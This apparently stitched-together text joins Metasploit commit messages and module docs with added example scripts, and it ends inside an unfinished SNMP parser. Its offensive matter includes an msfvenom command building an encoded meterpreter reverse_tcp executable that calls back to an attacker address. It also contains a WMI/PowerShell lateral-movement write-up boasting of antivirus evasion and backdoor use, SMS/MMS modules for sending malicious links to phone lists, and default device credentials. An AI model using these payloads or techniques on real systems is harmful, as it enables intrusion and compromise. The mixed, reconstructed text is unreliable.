Some railgun definitions for the kernel32 module define DWORD for the
functions return type when it should be HANDLE. This causes errors on
64-bit systems when the return value is truncated.
If we pass all the phone numbers at once in one email, it becomes
a group chat, and that allows the recipients to see each other's
number, which isn't the intended behavior.
Adds a basic Dockerfile and docker-compose config. `docker-compose.yml`
adds a named volume for postgres so data should persist.
`$HOME/.msf4` will be mounted to `/root/.msf4` by default.
Port 4444 is exposed by default.
Basic Usage:
```
docker/bin/msfconsole
docker/bin/msfvenom
```
This PR enables connection to a Nexpose console using the
nexpose client gem.
It also allows you to connect using a trusted certificate
instead of simply overriding the SSL validation.
The shell does exactly the same as the previous, just made the code read much
better so as to not severely anger the gray beards and other lesser
mainframe deities. The only architectural change is the payload uses the
spawn system call vs exec - this provides for a cleaner exit in some cases.
The check_setup method expects an error message if the
web server is not compatible with the module, and false otherwise.
We were previously returning the opposite of the expected behavior.
The owa_login module currently misses a success condition where the
creds are valid but there is no mailbox setup. This commit adds the
check for the condition for OWA 2013.
This commit sets two more options to `0` in the payload:
- [cgi.force_redirect](https://secure.php.net/manual/en/ini.core.php#ini.cgi.force-redirect)
- [cgi.redirect_status_env](https://secure.php.net/manual/en/ini.core.php#ini.cgi.redirect-status-env)
The configuration directive `cgi.force_redirect` prevents anyone from calling PHP
directly with a URL like http://my.host/cgi-bin/php/secretdir/script.php.
Instead, PHP will only parse in this mode if it has gone through a web server redirect rule.
The string set in the configuration directive `cgi.redirect_status_env`
is the one that PHP will look for to know it's ok to continue its
execution. This might be used together with the previous configuration
option as a security measure.
Setting those variables to 0 is (as stated in the documentation) a
security issue, but it also makes the exploit work on some Apache2 setups.
Array2Hex in the automotive extension now supports passing an array of integers or hex strings
Added some extra error handling for UDS calls to non-supported pids
Things like browser exploits don't have remote host options
which is what auto targeting relies on, so it does not make sense
to include the auto-targeting in these exploits
7837
the fallback to the original default was failing because
it was assuming rhost was already set, so it would always
go back to the first default target. now the auto_target? method
only returns true if it can pull an auto_target_host
the run_cmd method on meterpreter sessions can now
take an optional output IO to redirect output. This allows
backgrounded sessions to also run commands and still output
to the console
the target selection actually adjusts the datastore
as if a user selected the target, this prevents
a mismatch between the target and the target index
MS-2325
if the module author added an automatic target
we skip our routine, to let the module's own automatic targeting
take over as it will likely be better
MS-2325
targets now filtered by OS name, but a little
more processing may be needed on this part because
it looks like what you'd expect in os_flavor gets jammed
into name instead
MS-2325
This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization call on unauthenticated Java objects reaches the Apache Commons Collections (ACC) library, which allows remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.
1. Fix crash when no arguments are specified
2. Print history index starting at 1 like every shell
3. Fixed wording/phrasing
4. Fixed formatting/whitespace
Added the "history" command to see a list of commands used before.
```
msf exploit(handler) > history -n 4
2344 set PAYLOAD windows/meterpreter/reverse_tcp
2345 set LHOST 10.0.1.109
2346 exploit
2347 history -n 4
msf exploit(handler) > history -h
Usage: history [options]
Show the command history
OPTIONS:
-a Show length commands in history
-h Help banner.
-n <opt> Show the last n commands
msf exploit(handler) >
```
This commit adds a "to_handler" command to msfconsole when "using" a payload.
After generating a payload from msfconsole, we needed to set multi/handler and the payload with the same param as we used to generate it. That was really boring...
The to_handler command creates the handler and sets the payload and the options set for it.
### Example Output:
```
msf > use payload/windows/meterpreter_reverse_tcp
msf payload(meterpreter_reverse_tcp) > set LHOST 10.0.1.109
LHOST => 10.0.1.109
msf payload(meterpreter_reverse_tcp) > set LPORT 3377
LPORT => 3377
msf payload(meterpreter_reverse_tcp) > show options
Module options (payload/windows/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 10.0.1.109 yes The listen address
LPORT 3377 yes The listen port
msf payload(meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
[*] Started reverse TCP handler on 10.0.1.109:3377
[*] Starting the payload handler...
msf payload(meterpreter_reverse_tcp) >
```
I think PAYLOADSTR should take precedence over PAYLOADFILE. Usually,
you'll use PAYLOADFILE but might want to override with PAYLOADSTR. I
doubt this change will hurt anyone, since few people set both at once.
The payload description even says "either," so there's that.
It is inferred from the platform, and we don't want to override it
needlessly. :bourne is what worked during testing, but it won't always
work. Now we can override the flavor with CMDSTAGER::FLAVOR.
```
msf > use auxiliary/admin/http/nuuo_nvrmini_reset
msf auxiliary(nuuo_nvrmini_reset) > show
show actions    show all        show encoders  show exploits  show missing  show options   show plugins  show targets
show advanced   show auxiliary  show evasion   show info      show nops     show payloads  show post
```
This commit changes the post mixin so that the session compat check only
shows a warning rather than throwing an exception and stopping the
module from working completely.
This is off the back of the discussion involved with #7736
This streamlines the check for whether the currently-selected payload is
compatible on assignment. Rather than building the entire list of
compatible payloads, and seeing if what the user typed is in it (and
making multiple giant lists on the way), we simply check the module the
user typed directly.
Lots of people have been frustrated by the `sess` command as it mucks
with the autocomplete for `sessions`. This is a fair concern, especially
given that `sess` was intended to be a non-annoying shortcut.
This commit changes the `sess` command so that it is instead called
`terminal`. I couldn't think of a better option that didn't already
clash with another name or meaning. At least `terminal` is something
that doesn't clash, doesn't muck with any existing autocomplete rules,
and is in some way another name for the existing sessions.
Feedback appreciated!
Line originally references the read_timeout instance variable associated with the smb variable (line 118 || 120), which is an object of the simpleclient class that doesn't have a read_timeout instance variable. Updated the line to reference the client instance variable of smb, which does have a read_timeout variable. Testing this change appears to result in expected behavior.
This module "carves" a hash in the registry to set it as a user password.
The benefits are:
1/ It doesn't change the password last change field
2/ You can set a hash directly, so you can change a user's password and revert it without cracking its hash.
I have tested it in Windows 7, and 8.1. Should work on every version though.
Usage:
```
run post/windows/manage/hashcarve user=test pass=<password>
run post/windows/manage/hashcarve user=test pass=<nthash>
run post/windows/manage/hashcarve user=test pass=<lmhash:nthash>
```
This work is based on the hashdump implementation.
sometimes, as a user, you need to start a handler
but don't want to exit your current console context.
The new handler command allows a user to spin up a handler
in a background job without switching contexts
the async output fix was put in the parent UI IO
class when it only really makes sense in stdio.
Those ctrl sequences will only be understood if output to a
terminal.
MS-2298
Documentation, compiled binary and final implementation.
Completed the documentation, added the missing compiled binary and a
final and tested implementation of the module.
Came up on Twitter, where Justin may have been trolling a little:
https://twitter.com/jstnkndy/status/798671298302017536
We have a `print_good` method, but not a `print_bad`, which seems a
little weird for Ruby -- opposite methods should be intuitive as Justin
is implying.
Anyway, I went with alias_method, thanks to the compelling argument at
https://github.com/bbatsov/ruby-style-guide#alias-method
...since Metasploit is all about the singleton, and didn't want to risk
some unexpected scoping thing.
Also dang, we define the `print_` methods like fifty billion times!
Really should fix that some day.
when we cleaned up all the other powershell template refs
we missed the one in this module which seems to be replicating
large amounts of library code
7533
This module was inspired by the work done by Matt Nelson and Matt
Graeber who came up with the method in the first place. This works
nicely on a fully patched Windows 10 at the time of writing.
This commit moves much of the platform-specific logic from the
reverse_http handler down into the payloads. This makes the handler
a bit more agnostic of what the payload is (which is a good thing).
There is more to do here though, and things can be improved.
Handling of datastore settings has been changed to make room for the
ability to override the datastore completely when generating the
payloads. If a datastore is given via the `opts` then this is used
instead otherwise it falls back to the settings specified in the usual
datastore location.
Down the track, we'll have a payload that supports multiple stages, and
the datastore will be generated on the fly, along with the stage itself.
Without this work, there's no other nice way of getting datastore
settings to be contained per-stager.
It was found that Internet Explorer allows the disclosure of local file
names. This issue exists due to the fact that Internet Explorer behaves
differently for file:// URLs pointing to existing and non-existent files.
When used in combination with HTML5 sandbox iframes it is possible to
use this behavior to find out if a local file exists. This technique
only works on Internet Explorer 10 & 11 since these support the HTML5
sandbox. Also it is not possible to do this from a regular website as
file:// URLs are blocked altogether. The attack must be performed
locally (works with Internet zone Mark of the Web) or from a share.
Multiple DLL side loading vulnerabilities were found in various COM
components. These issues can be exploited by loading these components as
an embedded OLE object. When instantiating a vulnerable object Windows
will try to load one or more DLLs from the current working directory. If
an attacker convinces the victim to open a specially crafted (Office)
document from a directory also containing the attacker's DLL file, it is
possible to execute arbitrary code with the privileges of the target
user. This can potentially result in the attacker taking complete control
of the affected system.
Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoders to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoders (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoders to msfvenom in
one execution.
```
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80 LHOST=192.168.100.11 -e @x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x template.exe -f exe-only -o meterpreter.exe
```
PowerShell provides a direct interface to WMI, allowing users in UAC
or otherwise restricted context to attain privileged resources via
impersonation. Moreover, WMI allows for execution remotely, on any
endpoint attainable via DCOM. In practice, this allows foothold on
a single domain host to immediately infect every machine accessible
via DCOM either from the currently held privileged context (such as
a domain administrator) or from a new context generated by entering
acquired credentials.
Payloads, remote commands, and collection activities can be invoked
without direct IP connectivity on a remote host, and output can
be collected the same way.
Of particular note when implementing this technique is that admin
contexts resulting from this form of execution are not encapsulated
in UAC, allowing for immediate privesc to system if creating a new
session.
Old notes show that loopback exec is not stable or usable, though
this merits further research as it seems the native way to avoid
UAC altogether without any exploitation.
As with all the other powershell vectors, this mechanism provides
in-memory execution, and in all our testing walks right through the
AV currently out there since it has no service executable, on-disk
footprint, or even error log from the improper service exit that
psexec causes. Sandboxes don't cover powershell - too much runtime
entropy and some quite legitimate use of sockets and unmanaged
memory marshalling to get a good "guess" of what the code is trying
to do.
Makes for a great gift left behind in GPO startup scripts or other
latent backdoor approaches. Since a script is produced, those with
the need and craft can alter the resulting scripts to dynamically
enumerate domain hosts meeting their needs for exploitation at
runtime, as opposed to the "brute-force" approach used here.
-----
Testing:
The internal module has been in use for over three years in our
fork. Its been instrumental in showing several clients what it
means to be "pwned" in 30s flat. This particular version has been
slightly altered for upstream consumption and should be tested
again by community and developers alike in the upstream branch.
Note:
Word to the wise on target selection - choose carefully, it is
possible to generate more sessions than an L3 pivoted handler can
comfortably address, and having a thousand reverse_tcp sessions
going past the edge is sure to raise an eyebrow at the SOC.
2016-03-04 19:31:55 -05:00
```ruby
add_index "metasploit_credential_cores", ["workspace_id", "private_id"], name: "unique_private_metasploit_credential_cores", unique: true, where: "(((realm_id IS NULL) AND (public_id IS NULL)) AND (private_id IS NOT NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "public_id", "private_id"], name: "unique_realmless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NULL) AND (public_id IS NOT NULL)) AND (private_id IS NOT NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "public_id"], name: "unique_public_metasploit_credential_cores", unique: true, where: "(((realm_id IS NULL) AND (public_id IS NOT NULL)) AND (private_id IS NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "private_id"], name: "unique_publicless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NULL)) AND (private_id IS NOT NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id", "private_id"], name: "unique_complete_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NOT NULL)) AND (private_id IS NOT NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id"], name: "unique_privateless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NOT NULL)) AND (private_id IS NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "private_id"], name: "unique_private_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "public_id", "private_id"], name: "unique_realmless_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "public_id"], name: "unique_public_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "private_id"], name: "unique_publicless_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id", "private_id"], name: "unique_complete_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))", using: :btree
add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id"], name: "unique_privateless_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))", using: :btree
```
```bash
#!/bin/bash
# docker/bin/msfconsole: locate the framework checkout and start msfconsole in the compose service.
# The `if` lines that opened the blocks closed by the surviving `fi` lines were lost in
# extraction; the single condition below (derive MSF_PATH only when it is not already set)
# is an assumed reconstruction, and the two original `fi` lines are collapsed into one block.
if [ -z "$MSF_PATH" ]; then
  realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
  # determine script path
  pushd "$(dirname "$(realpath "$0")")" > /dev/null
  path=$(pwd)
  popd > /dev/null
  MSF_PATH=$(dirname "$(dirname "$path")")
fi
cd "$MSF_PATH" || exit 1
docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@"
```
```bash
#!/bin/bash
# docker/bin/msfvenom: same path discovery as docker/bin/msfconsole, then run msfvenom in the
# compose service. As above, the lost `if` lines are reconstructed under the assumption that
# MSF_PATH is only derived when it is not already set; the two `fi` lines are collapsed into one.
if [ -z "$MSF_PATH" ]; then
  realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
  # determine script path
  pushd "$(dirname "$(realpath "$0")")" > /dev/null
  path=$(pwd)
  popd > /dev/null
  MSF_PATH=$(dirname "$(dirname "$path")")
fi
cd "$MSF_PATH" || exit 1
docker-compose run --rm --service-ports ms ./msfvenom "$@"
```
The administrator application was removed as of Tomcat 6. Tomcat 5.5.36 is available from [apache](https://archive.apache.org/dist/tomcat/tomcat-5/v5.5.36/). This does not have the `admin` app bundled though, and can be downloaded [here](https://archive.apache.org/dist/tomcat/tomcat-5/v5.5.36/bin/apache-tomcat-5.5.36-admin.zip).
To utilize the `admin` application, a user must have the permission `admin` applied to their account. The following user line will handle all necessary permissions:
The ```auxiliary/client/mms/send_mms``` module allows you to send a malicious attachment to a
collection of phone numbers of the same carrier.
In order to use this module, you must set up your own SMTP server to deliver messages. Popular
mail services such as Gmail, Yahoo, Live should work fine.
## Module Options
**CELLNUMBERS**
The 10-digit phone number (or numbers) you want to send the MMS text to. If you wish to target
against multiple phone numbers, ideally you want to create the list in a text file (one number per
line), and then load the CELLNUMBERS option like this:
```
set CELLNUMBERS file:///tmp/att_phone_numbers.txt
```
Remember that these phone numbers must be on the same carrier.
**MMSCARRIER**
The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
supported carriers.
**TEXTMESSAGE**
The text message you want to send. For example, this will send a text with a link to google:
```
set TEXTMESSAGE "Hi, please go: google.com"
```
The link should automatically be parsed on the phone and clickable.
**MMSFILE**
The attachment to send in the message.
**MMSFILECTYPE**
The content type to use for the attachment. Commonly supported ones include:
* audio/midi
* image/jpeg
* image/gif
* image/png
* video/mp4
To find more, please try this [list](http://www.freeformatter.com/mime-types-list.html)
**SMTPADDRESS**
The mail server address you wish to use to send the MMS messages.
**SMTPPORT**
The mail server port. By default, this is ```25```.
**SMTPUSERNAME**
The username you use to log into the SMTP server.
**SMTPPASSWORD**
The password you use to log into the SMTP server.
**SMTPFROM**
The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```. Some carriers require this
in order to receive the text, such as AT&T.
**MMSSUBJECT**
The MMS subject. Some carriers require this in order to receive the text, such as AT&T.
## Supported Carrier Gateways
The module supports the following carriers:
* AT&T
* Sprint
* T-Mobile
* Verizon
* Google Fi
## Finding the Carrier for a Phone Number
Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
how to identify the carrier of a phone number. There are many services that can do this, such as:
http://freecarrierlookup.com/
## Gmail SMTP Example
Gmail is a popular mail server, so we will use this as a demonstration.
Assuming you are already using two-factor authentication, you need to create an [application password](https://support.google.com/accounts/answer/185833?hl=en).
After creating the application password, configure auxiliary/client/mms/send_mms this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set mmscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set textmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.gmail.com```
* ```set smtpport 587```
* ```set mmsfile /tmp/example.mp4```
* ```set mmsfilectype video/mp4```
* ```set smtpusername [USERNAME FOR GMAIL]``` (you don't need ```@gmail.com``` at the end)
* ```set smtppassword [APPLICATION PASSWORD]```
And you should be ready to go.
## Yahoo SMTP Example
Yahoo is also a fairly popular mail server (although much slower to deliver compared to Gmail),
so we will demonstrate it as well.
Before using the module, you must do this to your Yahoo account:
1. Sign in to Yahoo Mail.
2. [Go to your "Account security" settings.](https://login.yahoo.com/account/security#less-secure-apps)
3. Turn on Allow apps that use less secure sign in.
After configuring your Yahoo account, configure auxiliary/client/mms/send_mms this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set mmscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set textmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.mail.yahoo.com```
* ```set smtpport 25```
* ```set mmsfile /tmp/example.mp4```
* ```set mmsfilectype video/mp4```
* ```set smtpusername [USERNAME FOR YAHOO]@yahoo.com```
* ```set smtppassword [YAHOO LOGIN PASSWORD]```
And you're good to go.
## Demonstration
After setting up your mail server and the module, your output should look similar to this:
The ```auxiliary/client/sms/send_text``` module allows you to send a malicious text/link to a collection
of phone numbers of the same carrier.
In order to use this module, you must set up your own SMTP server to deliver messages. Popular
mail services such as Gmail, Yahoo, Live should work fine.
## Module Options
**CELLNUMBERS**
The 10-digit phone number (or numbers) you want to send the text to. If you wish to target against
multiple phone numbers, ideally you want to create the list in a text file (one number per line),
and then load the CELLNUMBERS option like this:
```
set CELLNUMBERS file:///tmp/att_phone_numbers.txt
```
Remember that these phone numbers must be on the same carrier.
**SMSCARRIER**
The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
supported carriers.
**SMSMESSAGE**
The text message you want to send. For example, this will send a text with a link to google:
```
set SMSMESSAGE "Hi, please go: google.com"
```
The link should automatically be parsed on the phone and clickable.
**SMTPADDRESS**
The mail server address you wish to use to send the text messages.
**SMTPPORT**
The mail server port. By default, this is ```25```.
**SMTPUSERNAME**
The username you use to log into the SMTP server.
**SMTPPASSWORD**
The password you use to log into the SMTP server.
**SMTPFROM**
The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.
## Supported Carrier Gateways
The module supports the following carriers:
* AllTel
* AT&T Wireless
* Boost Mobile
* Cricket Wireless
* Google Fi
* T-Mobile
* Verizon
* Virgin Mobile
**Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
not supported.
## Finding the Carrier for a Phone Number
Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
how to identify the carrier of a phone number. There are many services that can do this, such as:
http://freecarrierlookup.com/
**Note:** If the phone is using Google Fi, then it may appear as a different carrier.
## Gmail SMTP Example
Gmail is a popular mail server, so we will use this as a demonstration.
Assuming you are already using two-factor authentication, you need to create an [application password](https://support.google.com/accounts/answer/185833?hl=en).
After creating the application password, configure auxiliary/client/sms/send_text this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set smscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set smsmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.gmail.com```
* ```set smtpport 587```
* ```set smtpusername [USERNAME FOR GMAIL]``` (you don't need ```@gmail.com``` at the end)
* ```set smtppassword [APPLICATION PASSWORD]```
And you should be ready to go.
## Yahoo SMTP Example
Yahoo is also a fairly popular mail server (although much slower to deliver compared to Gmail),
so we will demonstrate it as well.
Before using the module, you must do this to your Yahoo account:
1. Sign in to Yahoo Mail.
2. [Go to your "Account security" settings.](https://login.yahoo.com/account/security#less-secure-apps)
3. Turn on Allow apps that use less secure sign in.
After configuring your Yahoo account, configure auxiliary/client/sms/send_text this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set smscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set smsmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.mail.yahoo.com```
* ```set smtpport 25```
* ```set smtpusername [USERNAME FOR YAHOO]@yahoo.com```
* ```set smtppassword [YAHOO LOGIN PASSWORD]```
And you're good to go.
## Demonstration
After setting up your mail server and the module, your output should look similar to this:
The module uses the Censys REST API to access the same data accessible through the web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
This module allows you to log into a BAVision IP Camera's web server.
The instructions shipped with the camera do not clearly mention the existence of the
lighttpd web server, which uses admin:123456 as the default credential. Even if the default
password is changed, the account could still be brute-forced since there is no lockout policy.
## Vulnerable Application
The web server is built into the IP camera. Specifically, this camera was tested during development:
"BAVISION 1080P HD Wifi Wireless IP Camera Home Security Baby Monitor Spy Pet/Dog Cameras Video Monitoring Plug/Play,Pan/Tilt With Two-Way Audio and Night Vision"
http://goo.gl/pHAqS1
## Verification Steps
1. Read the instructions that come with the IP camera to set it up
2. Find the IP of the camera (in a lab, your router's client list should show it)
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts: 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to the device config, the 'root' user can also access the password file. The other users (admin, alg, user) can only access the configuration file. The module attempts to download the configuration and password files depending on the login credentials found.
This module is a scanner which enumerates Google Chromecast devices via their HTTP interface (default port 8008). The WiFi access point the Chromecast is connected to is also enumerated.
This module is a scanner which enumerates WiFi access points visible from a Google Chromecast via its HTTP interface (default port 8008). Any WiFi access point the Chromecast is associated with or can be associated with is marked with an `(*)`.
Meteocontrol WEB'Log Data Loggers are affected by an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract the Administrator password for the device management portal.
Note: In some versions, the 'Website password' page is renamed or not present. In those cases the password cannot be extracted and manual verification will be required.
RPC Portmapper, more recently renamed rpcbind, is fairly common and this scanner searches for its existence. The idea behind rpcbind was to create a
'directory' that could be asked where (on which port) a service is running. Having this single port/service be queryable meant the services being managed by rpcbind
could actually be running on any port or protocol, and rpcbind would be in charge of letting clients know where they were. This is more or less an outdated
model/service, and NFS is arguably the most popular service still utilizing rpcbind. The following was done on Kali linux:
1. Install rpcbind: `apt-get install rpcbind`
2. You now have `rpcbind`, but with minimal services registered on it. You may want to install additional ones:
* NIS: `apt-get install nis`
* Start the service: `ypserv`
* NFS: `apt-get install nfs-kernel-server`
3. Just to be safe, restart rpcbind: `service rpcbind restart`
NFS is very common, and this scanner searches for a mis-configuration, not a vulnerable software version. Installation instructions for NFS can be found for every operating system.
The [Ubuntu 14.04](https://help.ubuntu.com/14.04/serverguide/network-file-system.html) instructions can be used as an example for installing and configuring NFS. The
4. Restart the service: `service nfs-kernel-server restart`
In this scenario, `closed_share` is set to read only, and only mountable by the IP 10.1.2.3. `open_share` is mountable by anyone (`*`) in read/write mode.
Since NFS has been around since 1989, with modern NFS(v4) being released in 2000, there are many tools which can also be used to verify this configuration issue.
The following are other industry tools which can also be used.
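The misconfiguration this scanner looks for can also be checked straight from the server's own `/etc/exports`. The following is an added example, not the module's code: a small parser that flags shares any host may mount, run on a constructed exports file that mirrors the `closed_share` / `open_share` setup described above (the paths, the `/srv/home` and `/srv/backup` lines and the client addresses are this example's assumptions).

```python
"""
Audit /etc/exports for world-mountable NFS shares. Added example, not the
nfsmount scanner's code. SAMPLE_EXPORTS is a constructed file mirroring the
closed_share/open_share scenario above, not a real server's configuration.
"""
import re

# constructed sample, not a real server's file
SAMPLE_EXPORTS = """\
/srv/closed_share   10.1.2.3(ro,sync,no_subtree_check)
/srv/open_share     *(rw,sync,no_subtree_check)
/srv/home           192.168.0.0/24(rw,sync) *(ro,sync)
/srv/backup         *(rw,no_root_squash)          # root on any client is root here
"""

# one client spec: host, optionally followed by (opt,opt,...)
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return [(path, [(client, set_of_options), ...]), ...] for every export line."""
    exports = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # '#' starts a comment
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], []
        for token in fields[1:]:
            host, opts = CLIENT_RE.match(token).groups()
            # exports(5): options with no host in front of them, e.g. "/srv/x (rw)"
            # with a space before the parenthesis, apply to every client
            clients.append((host or "*", set(opts.split(",")) if opts else set()))
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """Findings for shares any host may mount: (path, 'rw'|'ro', root_not_squashed)."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            if host == "*":                                  # unrestricted wildcard
                access = "rw" if "rw" in opts else "ro"      # exportfs defaults to ro
                findings.append((path, access, "no_root_squash" in opts))
    return findings


if __name__ == "__main__":
    for path, access, unsquashed in audit_exports(SAMPLE_EXPORTS):
        extra = ", root not squashed" if unsquashed else ""
        print("%-20s mountable by anyone: %s%s" % (path, access, extra))
```

Only the bare `*` is treated as world-mountable here; a domain wildcard such as `*.example.com` is narrower and would need its own rule.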
Installation instructions for an SNMP server can be found for every operating system.
The [Ubuntu 14.04](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-an-snmp-daemon-and-client-on-ubuntu-14-04) instructions can be used as an example for installing and configuring SNMP. The
following was done on Kali linux:
1. `sudo apt-get install snmpd`
2. Set SNMP to listen on non-localhost: `nano /etc/snmp/snmpd.conf`
```
# Listen for connections from the local system only
#agentAddress udp:127.0.0.1:161
# Listen for connections on all interfaces (both IPv4 *and* IPv6)
agentAddress udp:161,udp6:[::1]:161
```
3. Restart the service: `service snmpd restart`
### SNMP Versions
SNMP has 3 main versions.
* **1**, **2c**: both use a simple password (the community string), which is often left at the defaults `public` (read only) and `private` (read/write). Version 2c is backwards compatible with version 1. This is a plaintext protocol, so the community string can be read by anyone able to intercept the traffic.
* **3**: has several security levels and is significantly more complex, but is not covered by this module.
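To see exactly what the v1/v2c check above puts on the wire, the following added example (not the snmp_login module's code) hand-encodes a GetRequest for `sysDescr.0` in BER, parses the GetResponse, and tries each default community string against a host. The community string is visible in the datagram, and a wrong community gets no reply at all, since agents silently drop the request; `build_get_response` is only there so the parser can be exercised offline, and the host and sample `sysDescr` value are assumptions.

```python
"""
SNMPv1/v2c community-string check, hand-encoded in BER. Added example, not
the snmp_login module's code. Shows the cleartext community string and why
a timeout (no reply) is how a wrong community shows up.
"""
import socket

SYS_DESCR_OID = "1.3.6.1.2.1.1.1.0"
DEFAULT_COMMUNITIES = ("public", "private")    # the usual v1/v2c defaults
SNMP_V1, SNMP_V2C = 0, 1                        # values of the version field

def _ber_len(n):
    """BER length: short form below 128, long form (0x8N + N length bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _tlv(tag, payload):
    return bytes([tag]) + _ber_len(len(payload)) + payload

def _encode_int(value):
    """INTEGER, two's complement, minimal length (0 -> 1 byte, 128 -> 2 bytes)."""
    return _tlv(0x02, value.to_bytes((value.bit_length() + 8) // 8, "big", signed=True))

def _encode_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])     # first two arcs share one byte
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:                                # base-128, high bit = more follows
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))

def build_get_request(community, oid=SYS_DESCR_OID, version=SNMP_V2C, request_id=1):
    """Message ::= SEQUENCE { version, community OCTET STRING, GetRequest-PDU [0] }"""
    varbind = _tlv(0x30, _encode_oid(oid) + _tlv(0x05, b""))          # value: NULL
    pdu = _tlv(0xA0, _encode_int(request_id) + _encode_int(0) + _encode_int(0)
               + _tlv(0x30, varbind))
    return _tlv(0x30, _encode_int(version) + _tlv(0x04, community.encode()) + pdu)

def build_get_response(community, value, oid=SYS_DESCR_OID, version=SNMP_V2C, request_id=1):
    """GetResponse-PDU [2] as an agent would send it; used here for offline testing."""
    varbind = _tlv(0x30, _encode_oid(oid) + _tlv(0x04, value))
    pdu = _tlv(0xA2, _encode_int(request_id) + _encode_int(0) + _encode_int(0)
               + _tlv(0x30, varbind))
    return _tlv(0x30, _encode_int(version) + _tlv(0x04, community.encode()) + pdu)

def _read_tlv(buf, pos):
    """Return (tag, payload, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_response(datagram):
    """Return (community, error_status, value or None) from a GetResponse."""
    tag, msg, _ = _read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, _version, pos = _read_tlv(msg, 0)
    _, community, pos = _read_tlv(msg, pos)
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    if pdu_tag != 0xA2:
        raise ValueError("expected GetResponse-PDU, got tag 0x%02x" % pdu_tag)
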